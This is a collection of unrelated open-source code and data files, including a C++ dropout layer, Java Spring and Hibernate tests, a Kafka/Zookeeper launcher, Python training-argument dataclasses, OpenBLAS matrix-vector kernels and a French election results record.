machine parameters here, so effectively this is single-machine config tenTopData_->setBufferSize(tsize); if(!e->is_inference_only()) { if(bp_flag_) { tenBotDiff_ = tenBot_->addBuf(); // DIFF type and index tenBotDiff_->setDataType(dtype); tenBotDiff_->setBufferType(DIFF); long long int bsize = 1; for(int i=0; i<bs->ndims; i++) bsize = bsize*bs->dims[i]; if(dtype == DT_FLOAT) bsize = bsize*sizeof(float); else if(dtype == DT_INT) bsize = bsize*sizeof(int); // Set the size of the input-gradient buffer tenBotDiff_->setBufferSize(bsize); } } else tenBotDiff_ = NULL; // Compute scale via dropout_ratio threshold_ = p->get_dropout_ratio(); if(threshold_ != 0.5) { printf("Support for threshold %f not implemented! Resetting to 0.5\n",threshold_); threshold_ = 0.5; } scale_ = 1./(1 - threshold_); // Register output tensor in tensor map bool inserted = e->register_tensor(top_[0], ACT, tenTop_); if(!inserted) printf("Warning: Tensor %s already registered\n",NNNode::top_[0].c_str()); gparams_.batch_size = bs->dims[0]; gparams_.nInput = bs->dims[1]; gparams_.nOutput = gparams_.nInput; gparams_.iHeight = bs->dims[2]; gparams_.iWidth = bs->dims[3]; gparams_.oHeight = ts.dims[2]; gparams_.oWidth = ts.dims[3]; gparams_.data_type = dtype; gparams_.num_threads = e->get_num_threads(); seeds = new unsigned int[gparams_.num_threads]; for(int i=0; i<gparams_.num_threads; i++) seeds[i] = PRIME_SEED + i; eptr_ = e; }; void DropoutNode::forwardPropagate() { #ifdef RETURNALL return; #endif float* bot = (float*)(tenBotData_->getBuffer()); float* top = (float*)(tenTopData_->getBuffer()); int *mask = (int *)tenMask_; // unsigned int *seeds = tenSeeds_; #ifdef DEBUG printf("Executing FP %s: input %p, output %p\n",NNNode::nname_.c_str(), bot, top); printf("Inputs: %d\n",gparams_.nInput); printf("Outputs: %d\n",gparams_.nOutput); #endif int M = gparams_.batch_size; int N = gparams_.nOutput; int H = gparams_.oHeight; int W = gparams_.oWidth; if(eptr_->get_execution_mode() == TRAIN) { #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) { int r = rand_r(&seeds[omp_get_thread_num()]); if(r%2 == 0) top[i] = 0; else top[i] = bot[i] * scale_; } } else { #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) top[i] = bot[i]; } #ifdef DEBUG MeanOfLayer((char*)bottom_[0].c_str(), bot, M*N*H*W); MeanOfLayer((char*)top_[0].c_str(), top, M*N*H*W); #endif } void DropoutNode::backPropagate() { #ifdef REUTRNALL return; #endif int M = gparams_.batch_size; int N = gparams_.nOutput; int H = gparams_.oHeight; int W = gparams_.oWidth; TensorBuf *tenTopDiff = tenTop_->getBuf(DIFF); float *gtop = (float*)(tenTopDiff->getBuffer()); assert(gtop != NULL); float* gbot = (float*)(tenBotDiff_->getBuffer()); int *mask = (int *)tenMask_; #ifdef DEBUG printf("Executing BP %s: grad_output %p, grad_input %p\n",NNNode::nname_.c_str(), gtop, gbot); printf("Grad Outputs: %d\n", N*H*W); printf("Grad Inputs: %d\n", N*H*W); #endif assert(eptr_->get_execution_mode() == TRAIN); #ifdef _OPENMP #pragma omp parallel for #endif for (int i = 0; i < M*N*H*W; i++) gbot[i] = gtop[i] * mask[i] * scale_; #ifdef DEBUG MeanOfLayer((char*)bottom_[0].c_str(), gtop, M*N*H*W); MeanOfLayer((char*)top_[0].c_str(), gbot, M*N*H*W); #endif }
2,584
852
<reponame>ckamtsikis/cmssw #include <iostream> #include <string> #include "GeneratorInterface/HiGenCommon/interface/BaseHiGenEvtSelector.h" class HiGenEvtSelectorFactory { public: HiGenEvtSelectorFactory() { ; } virtual ~HiGenEvtSelectorFactory() { ; } static BaseHiGenEvtSelector* get(std::string, const edm::ParameterSet&); };
122
348
{"nom":"Annezin","circ":"9ème circonscription","dpt":"Pas-de-Calais","inscrits":4542,"abs":2358,"votants":2184,"blancs":46,"nuls":16,"exp":2122,"res":[{"nuance":"FN","nom":"M. <NAME>","voix":539},{"nuance":"MDM","nom":"Mme <NAME>","voix":473},{"nuance":"FI","nom":"<NAME>","voix":322},{"nuance":"RDG","nom":"M. <NAME>","voix":321},{"nuance":"LR","nom":"<NAME>-<NAME>","voix":194},{"nuance":"DVG","nom":"<NAME>","voix":70},{"nuance":"ECO","nom":"Mme <NAME>","voix":67},{"nuance":"DLF","nom":"M. <NAME>","voix":45},{"nuance":"COM","nom":"M. <NAME>","voix":34},{"nuance":"EXG","nom":"Mme <NAME>","voix":19},{"nuance":"DIV","nom":"M. <NAME>","voix":16},{"nuance":"ECO","nom":"M. <NAME>","voix":12},{"nuance":"DIV","nom":"M. <NAME>","voix":10}]}
305
310
<filename>embedded-azurite/src/test/java/com/playtika/test/azurite/EmbeddedAzuriteBoostrapConfigurationTest.java package com.playtika.test.azurite; import com.azure.storage.blob.BlobContainerClient; import com.azure.storage.blob.BlobServiceClient; import com.azure.storage.blob.BlobServiceClientBuilder; import org.junit.jupiter.api.DisplayName; import org.junit.jupiter.api.Test; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.autoconfigure.EnableAutoConfiguration; import org.springframework.boot.test.context.SpringBootTest; import java.util.UUID; import static org.assertj.core.api.Assertions.assertThat; @SpringBootTest(classes = EmbeddedAzuriteBoostrapConfigurationTest.AzuriteTestConfiguration.class) class EmbeddedAzuriteBoostrapConfigurationTest { @Autowired BlobServiceClientBuilder blobServiceClientBuilder; @Test void accountName() { BlobServiceClient blobServiceClient = blobServiceClientBuilder.buildClient(); assertThat(blobServiceClient.getAccountName()).isEqualTo(AzuriteProperties.ACCOUNT_NAME); } @Test @DisplayName("do some basic operations to show that azurite is running and working correctly") void createAndDeleteContainer() { BlobServiceClient blobServiceClient = blobServiceClientBuilder.buildClient(); long containersBefore = blobServiceClient.listBlobContainers().stream().count(); BlobContainerClient container = blobServiceClient.createBlobContainer(UUID.randomUUID().toString()); assertThat(container.listBlobs().stream()).isEmpty(); assertThat(blobServiceClient.listBlobContainers().stream().count()).isEqualTo(containersBefore + 1); container.delete(); assertThat(blobServiceClient.listBlobContainers().stream().count()).isEqualTo(containersBefore); } @EnableAutoConfiguration public static class AzuriteTestConfiguration { } }
628
963
package com.vladmihalcea.book.hpjp.hibernate.identifier; import org.hibernate.cfg.AvailableSettings; import org.junit.Test; import javax.persistence.*; import java.util.Properties; public class PreferredPooledLoSequenceIdentifierTest extends AbstractPooledSequenceIdentifierTest { @Override protected Class<?>[] entities() { return new Class<?>[] { Post.class }; } @Override protected void additionalProperties(Properties properties) { properties.put(AvailableSettings.PREFERRED_POOLED_OPTIMIZER, "pooled-lo"); } @Override protected Object newEntityInstance() { return new Post(); } @Test public void testOptimizer() { insertSequences(); } @Entity(name = "Post") public static class Post { @Id @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = "post_sequence") @SequenceGenerator( name = "post_sequence", sequenceName = "post_sequence", allocationSize = 3 ) private Long id; } }
446
1,229
<gh_stars>1000+ from dataclasses import dataclass from typing import Dict from typing import List, Optional from absl import logging from smart_arg import LateInit from smart_arg import arg_suite from smart_compose.utils import parsing_utils class Arg: """Helper class for cooperative multi-inheritance""" def _set_late_init_attr(self, attr, value): """Sets an attribute as empty list if it's LateInit""" if getattr(self, attr) is LateInit: setattr(self, attr, value) def __post_init__(self): pass @dataclass class NetworkArg(Arg): """Neural network related arguments""" num_units: int = 50 # Dimension of embedding. Also used as the hidden state size in RNN cell beam_width: int = 10 # Beam width of beam search decoding max_decode_length: int = 3 # Max length of decoding length_norm_power: float = 0. # Power of length normalization. Larger value means more penalty on long sequences generated by beam search min_seq_prob: float = 0. # Minimum probability of the emitted sequence. If set to zero, then no pruning will be performed @dataclass class FeatureArg(Arg): """Feature related arguments""" target_column_name: str = '' # Column name of the text source field # Vocab and word embedding vocab_file: str = '' # Vocab file vocab_hub_url: str = '' # TF hub url to vocab layer we_file: str = '' # Pretrained word embedding file embedding_hub_url: str = '' # TF hub url to embedding layer we_trainable: bool = True # Whether to train word embedding # Special tokens PAD: str = '[PAD]' # Token for padding SEP: str = '[SEP]' # Token for sentence separation CLS: str = '[CLS]' # Token for start of sentence UNK: str = '[UNK]' # Token for unknown word MASK: str = '[MASK]' # Token for masked word max_len: int = 32 # Max sent length. min_len: int = 3 # Min sent length. # Late init variables inferred from post initialization. DO NOT pass any values to the following arguments feature_type_2_name: Dict[str, str] = LateInit # Late init only. DO NOT pass value. Map of feature type to feature names def __post_init__(self): super().__post_init__() assert self.target_column_name, "target_column_name should not be empty" if not self.embedding_hub_url: assert self.vocab_hub_url or self.vocab_file, "If embedding hub url is not specified, vocab hub url or vocab file must be given" # Assemble feature map self.feature_type_2_name = dict() all_ftr_names = list() for ftr_type in parsing_utils.get_feature_types(): assert hasattr(self, ftr_type), f'{ftr_type} must be defined in Smart Compose argument parser' ftr_name = getattr(self, ftr_type) if ftr_name: self.feature_type_2_name[ftr_type] = ftr_name ftr_name = [ftr_name] if not isinstance(ftr_name, list) else ftr_name all_ftr_names += ftr_name assert len(set(all_ftr_names)) == len( all_ftr_names), f'Duplicate feature names for feature type {ftr_type}' @dataclass class DatasetArg(Arg): """Dataset related arguments""" num_gpu: int = -1 # Number of GPU for training distribution_strategy: str = '' # Distributed training strategy. Reference: tf official models: official/common/distribute_utils.py#L102 __distribution_strategy = {'choices': ['one_device', 'mirrored', 'parameter_server', 'multi_worker_mirrored', 'tpu']} all_reduce_alg: Optional[str] = None # All reduce algorithm. Reference: tf official models: official/common/distribute_utils.py#L102 __all_reduce_alg = {'choices': ["hierarchical_copy", "nccl", "ring"]} run_eagerly: bool = False # Whether to run in eager mode. Use True for debugging and False for speed train_file: str = '' # Train file. dev_file: str = '' # Dev file. test_file: str = '' # Test file. out_dir: str = '' # Store log/model files. num_train_steps: int = 1 # Num steps to train. num_eval_steps: int = 0 # Num steps to eval. num_epochs: int = 0 # Num of epochs to train, will overwrite train_steps if set steps_per_stats: int = 100 # training steps to print statistics. num_eval_rounds: int = 0 # number of evaluation round, this param will override steps_per_eval as max(1, num_train_steps / num_eval_rounds) steps_per_eval: int = 1000 # training steps to evaluate datasets. resume_training: bool = False # Whether to resume training from checkpoint in out_dir. keep_checkpoint_max: int = 5 # The maximum number of recent checkpoint files to keep. If 0, all checkpoint files are kept. Defaults to 5 train_batch_size: int = 32 # Training data batch size. test_batch_size: int = 32 # Test data batch size. def __post_init__(self): super().__post_init__() # Check matches between distribution strategy and all reduce algorithm. Reference: tf official models: official/common/distribute_utils.py#L102 if self.all_reduce_alg is not None: if self.distribution_strategy == 'mirrored': assert self.all_reduce_alg in [None, 'nccl', 'hierarchical_copy'] elif self.distribution_strategy == 'multi_worker_mirrored': assert self.all_reduce_alg in [None, 'nccl', 'ring'] else: raise NotImplementedError( f'Unsupported all reduce algorithm {self.all_reduce_alg} for chosen distribution strategy {self.distribution_strategy}') assert self.train_file, 'training_file must be specified' assert self.dev_file, 'dev_file must be specified' assert self.test_file, 'test_file must be specified' assert self.out_dir, 'out_dir must be specified' assert self.num_gpu >= 0, 'num_gpu must be specified' assert self.distribution_strategy, 'distribution_strategy must be specified' assert self.keep_checkpoint_max >= 0, 'keep_checkpoint_max must >= 0' # If epoch is set, overwrite training steps if self.num_epochs: steps_per_epoch = parsing_utils.estimate_steps_per_epoch(self.train_file, self.train_batch_size) self.num_train_steps = steps_per_epoch * self.num_epochs # If num_eval_rounds is set, override steps_per_eval assert self.num_eval_rounds >= 0, 'num_eval_rounds must be non-negative integers' if self.num_eval_rounds: self.steps_per_eval = max(1, int(self.num_train_steps / self.num_eval_rounds)) if self.steps_per_stats > self.steps_per_eval: logging.error('steps_per_stats: %d is specified to be greater than steps_per_eval: %d, we will use steps_per_eval as' ' steps_per_stats.', self.steps_per_stats, self.steps_per_eval) self.steps_per_stats = self.steps_per_eval @dataclass class OptimizationArg(Arg): """Optimization related arguments""" random_seed: int = 1234 # Random seed for experiment. Use the same random seed for experiment repeatability use_lr_schedule: bool = True # Whether to use warmup and decay on learning rate num_warmup_steps: int = 0 # Num steps for warmup. TODO: change to warm up ratio in the future optimizer: str = 'sgd' # Type of optimizer to use. adamw is the AdamWeightDecay optimizer use_bias_correction_for_adamw: bool = False # Whether to use bias correction for AdamWeightDecay optimizer __optimizer = {'choices': ['sgd', 'adam', 'adamw', 'lamb']} max_gradient_norm: float = 1.0 # Clip gradients to this norm. learning_rate: float = 1.0 # Learning rate lr_bert: float = 0.001 # Learning rate for BERT l1: float = 0. # Scale of L1 regularization l2: float = 0. # Scale of L2 regularization pmetric: str = '' # Primary metric __pmetric = {'choices': ['perplexity']} all_metrics: Optional[List[str]] = None # All metrics explicit_allreduce: bool = True # Whether to perform explicit allreduce def __post_init__(self): super().__post_init__() assert self.l1 >= 0, "l1 scale must be non-negative" assert self.l2 >= 0, "l2 scale must be non-negative" assert self.pmetric, "Please set your primary evaluation metric using --pmetric option" # Set all relevant evaluation metrics all_metrics = self.all_metrics if self.all_metrics else [self.pmetric] assert self.pmetric in all_metrics, "pmetric must be within all_metrics" self.all_metrics = all_metrics @arg_suite @dataclass class SmartComposeArg(DatasetArg, FeatureArg, OptimizationArg, NetworkArg): def __post_init__(self): """ Post initializes fields This method is automatically called by smart-arg once the argument is created by parsing cli or the constructor """ logging.info(f"Start __post_init__ the argument now: {self}") super().__post_init__()
3,354
347
package org.ovirt.engine.core.common.action; import org.ovirt.engine.core.compat.Guid; public class MaintenanceVdsParameters extends VdsActionParameters { private static final long serialVersionUID = -962696566094119431L; private boolean internal; private boolean stopGlusterService; public MaintenanceVdsParameters() { } public MaintenanceVdsParameters(Guid vdsId, boolean internal) { super(vdsId); this.internal = internal; } public MaintenanceVdsParameters(Guid vdsId, boolean internal, boolean stopGlusterService) { this(vdsId, internal); this.stopGlusterService = stopGlusterService; } public boolean isInternal() { return internal; } public boolean isStopGlusterService() { return stopGlusterService; } }
285
450
package com.kafkasprout.backend; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; public class StartZoo { private String path; private String OS; // Start Zookeeper Constructor public StartZoo(String path, String OS) { this.path = path; this.OS = OS; } // Process Builder to input command line arguments to start Zookeeper public boolean run() { String[] command = new String[2]; command[0] = OS.contains("windows") ? "zookeeper-server-start.bat" : "zookeeper-server-start"; command[1] = path + "/" + "zookeeper.properties"; ProcessBuilder processBuilder = new ProcessBuilder(command); try { System.out.println("Starting Zookeeper server"); Process process = processBuilder.start(); BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream())); String line; while ((line = reader.readLine()) != null) { System.out.println(line); if (line.contains("binding to port")) { // If Zookeeper server started successfully, start Kafka server System.out.println("Zookeeper available and bound to port"); boolean response = StartBroker.run(path + "/server.properties"); if (response) { return true; } } // [2020-07-15 17:13:41,105] INFO [KafkaServer id=0] shut down completed // (kafka.server.KafkaServer) } } catch (IOException e) { // Print stack trace if zookeeper or kafka server failed e.printStackTrace(); return false; } return false; } }
607
1,127
// Copyright (C) 2018-2022 Intel Corporation // SPDX-License-Identifier: Apache-2.0 // #pragma once #include "kernel_base_opencl.h" #include "kernel_selector_params.h" namespace kernel_selector { //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // lstm_dynamic_timeloop_params //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// struct lstm_dynamic_timeloop_params : public base_params { lstm_dynamic_timeloop_params() : base_params(KernelType::LSTM_DYNAMIC_TIMELOOP) {} DataTensor recurrent; DataTensor hidden; DataTensor cell; DataTensor last_hidden_output; DataTensor last_cell_output; float clip = 0.0f; bool input_forget = false; bool has_hidden = false; bool has_cell = false; bool has_last_hidden_output = false; bool has_last_cell_output = false; int32_t direction = 1; void set_hidden(const DataTensor& v) { hidden = v; has_hidden = true; } void set_cell(const DataTensor& v) { cell = v; has_cell = true; } void set_last_hidden_output(const DataTensor& v) { last_hidden_output = v; has_last_hidden_output = true; } void set_last_cell_output(const DataTensor& v) { last_cell_output = v; has_last_cell_output = true; } ParamsKey GetParamsKey() const override { ParamsKey k = base_params::GetParamsKey(); if (has_hidden) { k.EnableLSTMGEMMHidden(); } if (has_cell) { k.EnableLSTMEltCell(); } if (has_last_hidden_output) { k.EnableLSTMDyanmicOptionalHiddenOutput(); } if (has_last_cell_output) { k.EnableLSTMDyanmicOptionalCellOutput(); } return k; } }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // lstm_dynamic_timeloop_optional_params //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// struct lstm_dynamic_optional_params : optional_params { lstm_dynamic_optional_params() : optional_params(KernelType::LSTM_DYNAMIC_TIMELOOP) {} }; //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // LSTM_DynamicTimeloopKernelBase //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// class LSTM_DynamicTimeloopKernelBase : public KernelBaseOpenCL { public: using KernelBaseOpenCL::KernelBaseOpenCL; virtual ~LSTM_DynamicTimeloopKernelBase() {} struct DispatchData : public CommonDispatchData {}; protected: virtual JitConstants GetJitConstants(const lstm_dynamic_timeloop_params& params) const; static DispatchData SetDefault(const lstm_dynamic_timeloop_params& params); KernelsData GetCommonKernelsData(const Params& params, const optional_params& optParams) const; void SetKernelArguments(const lstm_dynamic_timeloop_params& params, clKernelData& k_data) const; bool Validate(const Params& p, const optional_params&) const override { if (p.GetType() != KernelType::LSTM_DYNAMIC_TIMELOOP) { return false; } return true; } }; } // namespace kernel_selector
1,230
4,392
/*************************************************************************** Copyright (c) 2014, The OpenBLAS Project All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the OpenBLAS project nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OPENBLAS PROJECT OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *****************************************************************************/ #include "common.h" #define NBMAX 4096 #ifndef HAVE_KERNEL_16x4 static void sgemv_kernel_16x4(BLASLONG n, FLOAT **ap, FLOAT *x, FLOAT *y) { BLASLONG i; FLOAT *a0,*a1,*a2,*a3; a0 = ap[0]; a1 = ap[1]; a2 = ap[2]; a3 = ap[3]; for ( i=0; i< n; i+=4 ) { y[i] += a0[i]*x[0] + a1[i]*x[1] + a2[i]*x[2] + a3[i]*x[3]; y[i+1] += a0[i+1]*x[0] + a1[i+1]*x[1] + a2[i+1]*x[2] + a3[i+1]*x[3]; y[i+2] += a0[i+2]*x[0] + a1[i+2]*x[1] + a2[i+2]*x[2] + a3[i+2]*x[3]; y[i+3] += a0[i+3]*x[0] + a1[i+3]*x[1] + a2[i+3]*x[2] + a3[i+3]*x[3]; } } #endif static void sgemv_kernel_16x1(BLASLONG n, FLOAT *ap, FLOAT *x, FLOAT *y) { BLASLONG i; FLOAT *a0; a0 = ap; for ( i=0; i< n; i+=4 ) { y[i] += a0[i]*x[0]; y[i+1] += a0[i+1]*x[0]; y[i+2] += a0[i+2]*x[0]; y[i+3] += a0[i+3]*x[0]; } } static void zero_y(BLASLONG n, FLOAT *dest) { BLASLONG i; for ( i=0; i<n; i++ ) { *dest = 0.0; dest++; } } static void add_y(BLASLONG n, FLOAT *src, FLOAT *dest, BLASLONG inc_dest) { BLASLONG i; if ( inc_dest == 1 ) { for ( i=0; i<n; i+=4 ) { dest[i] += src[i]; dest[i+1] += src[i+1]; dest[i+2] += src[i+2]; dest[i+3] += src[i+3]; } } else { for ( i=0; i<n; i++ ) { *dest += *src; src++; dest += inc_dest; } } } int CNAME(BLASLONG m, BLASLONG n, BLASLONG dummy1, FLOAT alpha, FLOAT *a, BLASLONG lda, FLOAT *x, BLASLONG inc_x, FLOAT *y, BLASLONG inc_y, FLOAT *buffer) { BLASLONG i; BLASLONG j; FLOAT *a_ptr; FLOAT *x_ptr; FLOAT *y_ptr; FLOAT *ap[4]; BLASLONG n1; BLASLONG m1; BLASLONG m2; BLASLONG n2; FLOAT xbuffer[4],*ybuffer; if ( m < 1 ) return(0); if ( n < 1 ) return(0); ybuffer = buffer; n1 = n / 4 ; n2 = n % 4 ; m1 = m - ( m % 16 ); m2 = (m % NBMAX) - (m % 16) ; y_ptr = y; BLASLONG NB = NBMAX; while ( NB == NBMAX ) { m1 -= NB; if ( m1 < 0) { if ( m2 == 0 ) break; NB = m2; } a_ptr = a; x_ptr = x; zero_y(NB,ybuffer); for( i = 0; i < n1 ; i++) { xbuffer[0] = alpha * x_ptr[0]; x_ptr += inc_x; xbuffer[1] = alpha * x_ptr[0]; x_ptr += inc_x; xbuffer[2] = alpha * x_ptr[0]; x_ptr += inc_x; xbuffer[3] = alpha * x_ptr[0]; x_ptr += inc_x; ap[0] = a_ptr; ap[1] = a_ptr + lda; ap[2] = ap[1] + lda; ap[3] = ap[2] + lda; sgemv_kernel_16x4(NB,ap,xbuffer,ybuffer); a_ptr += 4 * lda; } for( i = 0; i < n2 ; i++) { xbuffer[0] = alpha * x_ptr[0]; x_ptr += inc_x; sgemv_kernel_16x1(NB,a_ptr,xbuffer,ybuffer); a_ptr += 1 * lda; } add_y(NB,ybuffer,y_ptr,inc_y); a += NB; y_ptr += NB * inc_y; } j=0; while ( j < (m % 16)) { a_ptr = a; x_ptr = x; FLOAT temp = 0.0; for( i = 0; i < n; i++ ) { temp += a_ptr[0] * x_ptr[0]; a_ptr += lda; x_ptr += inc_x; } y_ptr[0] += alpha * temp; y_ptr += inc_y; a++; j++; } return(0); }
2,226
504
<reponame>tenglongcong/amgcl<filename>tests/test_solver_blaze.cpp #define BOOST_TEST_MODULE TestSolvers #include <boost/test/unit_test.hpp> #include <amgcl/backend/blaze.hpp> #include "test_solver.hpp" BOOST_AUTO_TEST_SUITE( test_solvers ) BOOST_AUTO_TEST_CASE(test_blaze_backend) { test_backend< amgcl::backend::blaze<double> >(); } BOOST_AUTO_TEST_SUITE_END()
175
2,215
# # Copyright (c) 2021 salesforce.com, inc. # All rights reserved. # SPDX-License-Identifier: BSD-3-Clause # For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause # """ Datasets for time series anomaly detection (TSAD). All the time series in these datasets have anomaly labels. """ from ts_datasets.anomaly.base import TSADBaseDataset from ts_datasets.anomaly.iops_competition import IOpsCompetition from ts_datasets.anomaly.nab import NAB from ts_datasets.anomaly.synthetic import Synthetic from ts_datasets.anomaly.ucr import UCR from ts_datasets.anomaly.smd import SMD from ts_datasets.anomaly.smap import SMAP from ts_datasets.anomaly.msl import MSL __all__ = ["get_dataset", "TSADBaseDataset", "IOpsCompetition", "NAB", "Synthetic", "UCR", "SMD", "SMAP", "MSL"] def get_dataset(dataset_name: str, rootdir: str = None) -> TSADBaseDataset: """ :param dataset_name: the name of the dataset to load, formatted as ``<name>`` or ``<name>_<subset>``, e.g. ``IOPsCompetition`` or ``NAB_realAWSCloudwatch`` :param rootdir: the directory where the desired dataset is stored. Not required if the package :py:mod:`ts_datasets` is installed in editable mode, i.e. with flag ``-e``. :return: the data loader for the desired dataset (and subset) desired """ name_subset = dataset_name.split("_", maxsplit=1) valid_datasets = set(__all__).difference({"TSADBaseDataset", "get_dataset"}) if name_subset[0] in valid_datasets: cls = globals()[name_subset[0]] else: raise KeyError( "Dataset should be formatted as <name> or " "<name>_<subset>, where <name> is one of " f"{valid_datasets}. Got {dataset_name} instead." ) if not hasattr(cls, "valid_subsets") and len(name_subset) == 2: raise ValueError( f"Dataset {name_subset[0]} does not have any subsets, " f"but attempted to load subset {name_subset[1]} by " f"specifying dataset name {dataset_name}." ) kwargs = dict() if len(name_subset) == 1 else dict(subset=name_subset[1]) return cls(rootdir=rootdir, **kwargs)
898
657
<filename>components/dht/dht.h /* * Copyright (c) 2016 <NAME> <https://github.com/jsuiker> * Copyright (c) 2018 <NAME> <<EMAIL>> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * 3. Neither the name of the copyright holder nor the names of itscontributors * may be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /** * @file dht.h * @defgroup dht dht * @{ * * ESP-IDF driver for DHT11, AM2301 (DHT21, DHT22, AM2302, AM2321), Itead Si7021 * * Ported from esp-open-rtos * * Copyright (c) 2016 <NAME> <https://github.com/jsuiker>\n * Copyright (c) 2018 <NAME> <<EMAIL>>\n * * BSD Licensed as described in the file LICENSE * * @note A suitable pull-up resistor should be connected to the selected GPIO line * */ #ifndef __DHT_H__ #define __DHT_H__ #include <driver/gpio.h> #include <esp_err.h> #ifdef __cplusplus extern "C" { #endif /** * Sensor type */ typedef enum { DHT_TYPE_DHT11 = 0, //!< DHT11 DHT_TYPE_AM2301, //!< AM2301 (DHT21, DHT22, AM2302, AM2321) DHT_TYPE_SI7021 //!< Itead Si7021 } dht_sensor_type_t; /** * @brief Read integer data from sensor on specified pin * * Humidity and temperature are returned as integers. * For example: humidity=625 is 62.5 %, temperature=244 is 24.4 degrees Celsius * * @param sensor_type DHT11 or DHT22 * @param pin GPIO pin connected to sensor OUT * @param[out] humidity Humidity, percents * 10, nullable * @param[out] temperature Temperature, degrees Celsius * 10, nullable * @return `ESP_OK` on success */ esp_err_t dht_read_data(dht_sensor_type_t sensor_type, gpio_num_t pin, int16_t *humidity, int16_t *temperature); /** * @brief Read float data from sensor on specified pin * * Humidity and temperature are returned as floats. * * @param sensor_type DHT11 or DHT22 * @param pin GPIO pin connected to sensor OUT * @param[out] humidity Humidity, percents, nullable * @param[out] temperature Temperature, degrees Celsius, nullable * @return `ESP_OK` on success */ esp_err_t dht_read_float_data(dht_sensor_type_t sensor_type, gpio_num_t pin, float *humidity, float *temperature); #ifdef __cplusplus } #endif /**@}*/ #endif // __DHT_H__
1,174
445
<gh_stars>100-1000 #pragma once struct PU; class QWidget; /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// struct PrivData { QWidget* parent; void* user_data; }; // TODO: Should not be here struct PluginInstance { PrivData priv; PU* ui_inst; }; PluginInstance* PluginUI_createTestPlugin(QWidget* parent);
114
515
/*============================================================================= Library: CTK Copyright (c) German Cancer Research Center, Division of Medical and Biological Informatics Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. =============================================================================*/ #ifndef CTKCMDLINEMODULEXMLPROGRESSWATCHER_H #define CTKCMDLINEMODULEXMLPROGRESSWATCHER_H #include "ctkCommandLineModulesCoreExport.h" #include <QObject> class ctkCmdLineModuleXmlProgressWatcherPrivate; class QIODevice; class QProcess; /** * \class ctkCmdLineModuleXmlProgressWatcher * \brief Provides progress updates of a module. * \ingroup CommandLineModulesCore_API * * This class is usually only used by back-end implementators for modules * which can report progress and results in the form of XML fragments written * to a QIODevice. */ class CTK_CMDLINEMODULECORE_EXPORT ctkCmdLineModuleXmlProgressWatcher : public QObject { Q_OBJECT public: ctkCmdLineModuleXmlProgressWatcher(QIODevice* input); ctkCmdLineModuleXmlProgressWatcher(QProcess* input); ~ctkCmdLineModuleXmlProgressWatcher(); Q_SIGNALS: void filterStarted(const QString& name, const QString& comment); void filterProgress(float progress, const QString& comment); void filterResult(const QString& parameter, const QString& value); void filterFinished(const QString& name, const QString& comment); void filterXmlError(const QString& error); void outputDataAvailable(const QByteArray& outputData); void errorDataAvailable(const QByteArray& errorData); 